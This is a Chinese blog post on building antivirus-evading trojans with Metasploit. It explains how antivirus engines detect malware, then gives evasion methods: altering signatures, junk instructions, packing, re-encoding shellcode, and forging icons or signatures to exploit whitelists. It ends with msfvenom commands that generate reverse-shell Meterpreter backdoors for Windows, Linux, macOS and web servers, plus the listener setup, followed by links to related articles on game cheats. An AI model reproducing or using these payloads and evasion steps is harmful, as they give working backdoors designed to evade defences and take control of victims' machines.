msf生成免杀木马

article/2025/9/24 3:27:01

一.杀软原理

免杀概念
免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。
杀毒软件检测方式
特征代码法:“同一病毒或同类病毒的某一部分代码相同”的原理来识别病毒文件。该技术是利用留在受感染文件中的病毒特征值进行检测。发现新病毒后,对其进行分析,根据其特征编成病毒码,加入到数据库中。今后在执行查毒程序时,通过对比文件与病毒数据库中的病毒特征码,检查文件是否含有病毒。
校验和法:此法计算文件的校验和并保存,可定期或调用文件时进行对比,从而判断文件是否被病毒感染。
行为监测法:此法根据病毒的行为特征来识别病毒,这需要对病毒行为进行详细的分类和研究,分析那些病毒共同的行为,以及正常程序的罕见行为,根据程序运行时的行为进行病毒判断和预警。
软件模拟法:这种方法通过模拟病毒运行的方式来检测病毒特征。

杀毒软件主动防御
HIPS(主机入侵防御系统),常说的安全防护就是HIPS,其实就是杀毒软件会监控进程、流量,再和病毒库匹配,以及对不认识的文件上传到服务器进行模拟运行,研判是否是病毒,然后指导杀毒软件进行行为监控或者处理。

二.免杀技术介绍

1.修改特征码

免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)

就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。

一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。

第二种是针对目前推出的校验和查杀技术提出的免杀思想,它的原理虽然仍是特征码,但是已经脱离纯粹意义上特征码的概念,不过万变不离其宗。其实校验和也是根据病毒文件中与众不同的区块计算出来的,如果一个文件某个特定区域的校验和符合病毒库中的特征,那么反病毒软件就会报警。所以如果想阻止反病毒软件报警,只要对病毒的特定区域进行一定的更改,就会使这一区域的校验和改变,从而达到欺骗反病毒软件的目的。

修改特征码最重要的是定位特征码,但是定位了特征码修改后并不代表程序就能正常运行,费时费力,由于各个杀软厂商的特征库不同,所以一般也只能对一类的杀软起效果。虽然效果不好,但有时候在没有源码的情况下可以一用。

2.花指令免杀

花指令其实就是一段毫无意义的指令,也可以称之为垃圾指令。花指令是否存在对程序的执行结果没有影响,所以它存在的唯一目的就是阻止反汇编程序,或对反汇编设置障碍。

大多数反病毒软件是靠特征码来判断文件是否有毒的,而为了提高精度,现在的特征码都是在一定偏移量限制之内的,否则会对反病毒软件的效率产生严重的影响!而在黑客们为一个程序添加一段花指令之后,程序的部分偏移会受到影响,如果反病毒软件不能识别这段花指令,那么它检测特征码的偏移量会整体位移一段位置,自然也就无法正常检测木马了。

3.内存免杀

CPU不可能是为某一款加壳软件而特别设计的,因此某个软件被加壳后的可执行代码CPU是读不懂的。这就要求在执行外壳代码时,要先将原软件解密,并放到内存里,然后再通知CPU执行。

因为杀毒软件的内存扫描原理与硬盘上的文件扫描原理都是一样的,都是通过特征码比对的,只不过为了制造迷惑性,大多数反病毒公司的内存扫描与文件扫描采用的不是同一套特征码,这就导致了一个病毒木马同时拥有两套特征码,必须要将它们全部破坏掉才能躲过反病毒软件的查杀。

因此,除了加壳外,黑客们对抗反病毒软件的基本思路没变。而对于加壳,只要加一个会混淆程序原有代码的“猛”壳,其实还是能躲过杀毒软件的查杀的。

4.加壳免杀

说起软件加壳,简单地说,软件加壳其实也可以称为软件加密(或软件压缩),只是加密(或压缩)的方式与目的不一样罢了。壳就是软件的所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。

当我们运行这个加壳程序时,系统首先会运行程序的“壳”,然后由壳将加密的程序逐步还原到内存中,最后运行程序。这样一来,在我们看来,似乎加壳之后的程序并没有什么变化,然而它却达到了加密的目的,这就是壳的作用。

加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征。在某些比较流氓的国产杀软的检测方式下,主流的壳如VMP, Themida等,一旦被检测到加壳直接弹框告诉你这玩意儿有问题,虽然很直接,但是还是挺有效的。有些情况下,有的常见版本的壳会被直接脱掉分析。

面对这种情况可以考虑用一切冷门的加密壳,有时间精力的可以基于开源的压缩壳改一些源码,效果可能会很不错。

总得来说,加壳的方式来免杀还是比较实用的,特别是对于不开源的PE文件,通过加壳可以绕过很多特征码识别。

5.二次编译

    metasploitmsfvenom提供了多种格式的payloadencoder,生成的shellcode也为二次加工提供了很大遍历,但是也被各大厂商盯得死死的。而shikata_ga_naimsf中唯一的评价是excellent的编码器,这种多态编码技术使得每次生成的攻击载荷文件是不一样的,编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。

目前msfvenomencoder特征基本都进入了杀软的漏洞库,很难实现单一encoder编码而绕过杀软,所以对shellcode进行进一步修改编译成了msf免杀的主流。互联网上有很多借助于CC#python等语言对shellcode进行二次编码从而达到免杀的效果。

6.资源修改

有些杀软会设置有扫描白名单,比如之前把程序图标替换为360安全卫士图标就能过360的查杀。

1. 加资源

使用ResHacker对文件进行资源操作,找来多个正常软件,将它们的资源加入到自己软件,如图片,版本信息,对话框等。

2. 替换资源

使用ResHacker替换无用的资源(Version等)。

3. 加签名

使用签名伪造工具,将正常软件的签名信息加入到自己软件中。

msfvenom常用命令

 

-p: 指定payload模块

-l :列出可用项

-f :指定文件类型

-e:  加载编码器

-b:删除无效字符

-i :指定编码次数

-x: 捆绑文件

-o:导出文件

 -p, --payload

指定payload

--list payloads

列出可以设置的payload选项

-l, --list

列出可用项

-n, --nopsled

指定 nop payload 中的数量

-f, --format

指定文件输出格式

--list formats

列出可用输出格式

-e, --encoder

指定使用编码器

--list encoders

查看可用得编码器

-a, --arch

指定目标系统架构

--platform

指定目标系统

--list platforms

查看可用的目标系统

-s, --space

未经编码的 Payload 的最大长度

--encoder-space <length>

编码后的 Payload 的最大长度

-b, --bad-chars

设置在Payload 中避免出现的字符

-i, --iterations 

设置 Payload 的编码次数

-c, --add-code

包含额外的win32 shellcode文件

-x, --template

指定特定的可执行文件作为模板

-k, --keep    

保护模板程序的功能,注入的payload作为一个新的进程运行

-o, --out

保存 Payload 到文件

-v, --var-name

指定变量名

 生成常见的木马

生成一个常见木马文件:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.174.139 lport=1250 -f exe > shell.exe

 使用msfvenom快速生成木马并且进行连接

监听模块:

use exploit/multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

 常见后门生成方式

1.         Windows

Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe

Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe

2.         Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

3.         MAC

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

4.         PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT =1520 -f raw > shell.php

5.         Asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

6.         Aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

                                                                                          ————烟花女孩的笑容温暖了整个夏夜

 

 


http://chatgpt.dhexx.cn/article/OKV47fJu.shtml

相关文章

052 木马免杀全攻略

木马免杀全攻略 转载自&#xff1a;a1pass.blog.163.com 2007-12-07 14:02:24| 分类&#xff1a; 思绪燃星火——技 | 标签&#xff1a;黑客 杂志刊物 作者&#xff1a;A1Pass 出处&#xff1a;http://a1pass.blog.163.com/ 本文发表于07年第7期《黑客X档案》&#xff0c;与原…

渗透测试-木马免杀的几种方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

木马免杀方式

前言 免杀&#xff0c;又叫免杀毒技术&#xff0c;是反病毒&#xff0c;反间谍的对立面&#xff0c;是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外&#xff0c;还可以扩增病毒木马的功能&#xff0c;改变病毒木马的行为。免杀的基本特征是破坏…

Kali渗透-MSF木马免杀技术

前言 免杀技术全称为反杀毒技术 Anti-Virus 简称“免杀”&#xff0c;它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广&#xff0c;其中包含反汇编、逆向工程、系统漏洞等技术&#xff0c;内容基本上都是修改病毒、木马的内容改变特征码&#…

C语言C++制作游戏外挂,一个简单的内存外挂!

通过 C 语言编写一个简单的外挂&#xff0c;通过 API 函数修改游戏数据&#xff0c;从而实现作弊功能 对象分析 要用的 API 函数简单介绍 编写测试效果 总体评价 下面是小编整理好的一套C/C资料&#xff0c;加小编C/C编程学习群825414254获取系统性学习C/C的学习资料 对象分析…

使用MisakaPatcher制作Galgame外挂汉化补丁

简介 这两天我看见一个galgame机翻工具 MisakaTranslator&#xff0c;它类似VNR&#xff0c;使用C#编写并且支持Hook和OCR&#xff08;图像识别&#xff09;两种方法提取文本。 我在MisakaTranslator的基础上进行了一些改动&#xff0c;去除了所有的机翻的功能&#xff0c;转…

利用python编程,制作自己的游戏“外挂”!

Python简介及应用领域 Python是一种解释型脚本语言&#xff0c;可以应用于以下领域&#xff1a; Web 和 Internet开发科学计算和统计人工智能教育桌面界面开发软件开发后端开发网络爬虫 今天以一个小游戏和一小段代码来告诉大家编程有多好玩。 编程用的好&#xff0c;不仅可…

外挂的艺术-单机游戏辅助工具-网络游戏外挂

外挂&#xff08;wi gu&#xff09; 又叫开挂、开外挂、辅助、第三方辅助软件&#xff0c;综合某些修改器的功能进行编程出的游戏修改器。一般指通过修改游戏数据而为玩家谋取利益的作弊程序或软件&#xff0c;即利用电脑技术针对一个或多个软件进行非原设操作&#xff0c;篡改…

一步步用python制作游戏外挂【转】

玩过电脑游戏的同学对于外挂肯定不陌生&#xff0c;但是你在用外挂的时候有没有想过如何做一个外挂呢&#xff1f;&#xff08;当然用外挂不是那么道义哈&#xff0c;呵呵&#xff09;&#xff0c;那我们就来看一下如何用python来制作一个外挂。。。。 我打开了4399小游戏网&am…

制作游戏辅助/外挂违法吗?

不知道你们有没有过一个体验&#xff1a; 玩《绝地求生》的时候&#xff0c;我们辛辛苦苦开着车在跑毒&#xff0c;旁边“咻”的一下突然蹭上来一个人&#xff0c;徒步跑得竟然比车快&#xff1f; 然后吧他还跑到你旁边开麦问&#xff1a;“嘿&#xff01;兄弟&#xff01;挂…

游戏外挂攻防艺术

游戏外挂攻防艺术 (游戏外挂内幕首度解密 国内唯一相关权威著作) 徐胜 著 2013年2月出版 ISBN978-7-121-19532-7 定价:59.00元 256页 16开 编辑推荐 广义的外挂随处可见,一度喧嚣尘上的抢票浏览器其实就是外挂行为。对于游戏而言,外挂是一种通过篡改特定网游的部分程序而实…

想学制作外挂的新手看过来

新手学易语言制作辅助的准备 1.三套基础教学视频,如:(觅风、世恒、魔鬼…等等) 2.CE、OD的使用方法 3.汇编与逆向基础视频 4.了解并学习做自己的E模块 5.了解并学习怎么过游戏检测 6.实战: ①准备1套游戏实战教程 ②跟随教程找本地所玩游戏相关数据 ③编写第一个辅助 存在…

游戏外挂开发原理初探——植物大战僵尸内存挂为例

前言 对外挂有点兴趣&#xff0c;做番了解 一、游戏外挂开发原理 1、外挂分类 外挂现在大体上来讲分为三种&#xff0c;分别是模拟按键&#xff0c;WPE封包和内存挂 模拟键盘的&#xff0c;鼠标的&#xff0c;这种就叫做按键模拟&#xff0c;也叫脚本精灵修改数据包的&…

用Python制作游戏外挂(上)

源地址&#xff1a;http://eyehere.net/2012/python-game-bot-autopy-1/ 悲剧成我这样的人&#xff0c;我知道肯定不止我一个&#xff0c;所以我一点都不悲伤:-( 所以我打开了4399小游戏网&#xff0c;点开了一个不知名的游戏&#xff0c;唔&#xff0c;做寿司的&#xff0c;有…

游戏外挂制作原理

2019独角兽企业重金招聘Python工程师标准>>> 一、 前言   所谓游戏外挂&#xff0c;其实是一种游戏外辅程序&#xff0c;它可以协助玩家自动产生游戏动作、修改游戏网络数据包以及修改游戏内存数据等&#xff0c;以实现玩家用最少的时间和金钱去完成功力升级和过关…

Python制作安卓游戏外挂

Python制作安卓游戏外挂 最近在玩一款背单词的手机游戏&#xff0d;单词英雄&#xff0c;是一个将背单词和卡牌游戏相结合的游戏&#xff0c;通过选择正确的单词意思进行有效攻击&#xff0c;边玩游戏就把单词给背了。 游戏的界面是这样的&#xff1a; Paste_Image.png 通过选择…

一步步用python制作游戏外挂

玩过电脑游戏的同学对于外挂肯定不陌生&#xff0c;但是你在用外挂的时候有没有想过如何做一个外挂呢&#xff1f;&#xff08;当然用外挂不是那么道义哈&#xff0c;呵呵&#xff09;&#xff0c;那我们就来看一下如何用python来制作一个外挂。。。。 我打开了4399小游戏网&am…

游戏外挂怎么做?

文章目录 1.什么是游戏外挂2.外挂的分类及实现原理2.1 辅助类外挂2.2 专用插件类外挂2.3 通用工具2.4 内存修改器2.5 变速器2.6 按键精灵2.7 模拟器2.8 破解版 转载自&#xff1a;Anti-Cheat Expert 游戏安全专家 干货&#xff01;什么是游戏外挂&#xff0c;外挂的种类及实现原…

Windows关闭某个端口的服务

在开发过程中有些服务没有正常关闭&#xff0c;在重新启动新版本的服务的时候会存在端口占用的情况。就需要先停止之前的服务进程。 例如7777端口被占用。 1 查看7777端口被什么服务占用 netstat -ano | findstr 77772 停止该服务 使用taskkill /PID 55684 /T /F 这行命令停…

windows关闭端口

关闭8004端口 找到占用8080端口对应的程序的PID号 netstat -aon|findstr "8004"找到对应的程序名 tasklist|findstr "PID号"杀死程序 taskkill /f /t /im java.exe或者 taskkill /pid 7952 /F